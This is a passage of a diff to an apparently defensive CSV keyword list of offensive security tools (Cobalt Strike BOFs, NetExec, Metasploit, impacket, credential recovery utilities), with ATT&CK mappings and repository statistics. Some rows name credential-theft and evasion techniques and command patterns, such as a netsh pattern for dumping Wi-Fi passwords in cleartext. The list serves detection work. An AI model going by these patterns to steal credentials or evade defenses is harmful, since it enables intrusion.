identification.","T1040 - T1039 - T1036 - T1003","TA0006 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/net-creds","1","0","N/A","N/A","10","1562","443","2022-03-23T10:40:42Z","2015-01-07T18:47:46Z" "*netero1010/Quser-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*netero1010/ScheduleRunner*","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and lateral movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","3","299","42","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "*netero1010/ServiceMove-BOF*","offensive_tool_keyword","cobaltstrike","New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","10","10","223","45","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z" -"*NetExec ldap * --*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec ldap * --dc-ip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec ldap * -M enum_trusts*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec winrm *--*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"*NetExec ldap * --*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec ldap * --dc-ip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec ldap * -M enum_trusts*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec winrm *--*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*NetExec-main.zip*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*Net-GPPPassword.cs*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword.exe*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" "*Net-GPPPassword_dotNET*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" @@ -14008,47 +14169,47 @@ "*nethunter-*.torrent*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nethunter-*.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nethunter-*-oos-ten-kalifs-full.zip*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*netlm_downgrade.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*NETLMv2_fmt_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*netlm_downgrade.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NETLMv2_fmt_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*NetLoader.exe --path *.exe *","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*NetLoader-master*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*netloggedonusers.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*netlogon_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" -"*netntlm.pl *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*netntlm.pl *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*NetNTLMtoSilverTicket.git*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*NetNTLMtoSilverTicket-master*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*netpass.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netpass.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netpass_x64.exe*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*netpass-x64.zip*","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*netsniff-ng*","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*netstat -tnlp || ss -tnlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" -"*netstat -unlp || ss -unlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*netstat -tnlp || ss -tnlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*netstat -unlp || ss -unlp*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*nettitude/ETWHash*","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","3","229","27","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z" "*nettitude/MalSCCM*","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tools","https://github.com/nettitude/MalSCCM","1","1","N/A","10","3","223","34","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z" -"*netuser_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*netview_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*network2john.lua*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*netuser_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*netview.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*netview_enum*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 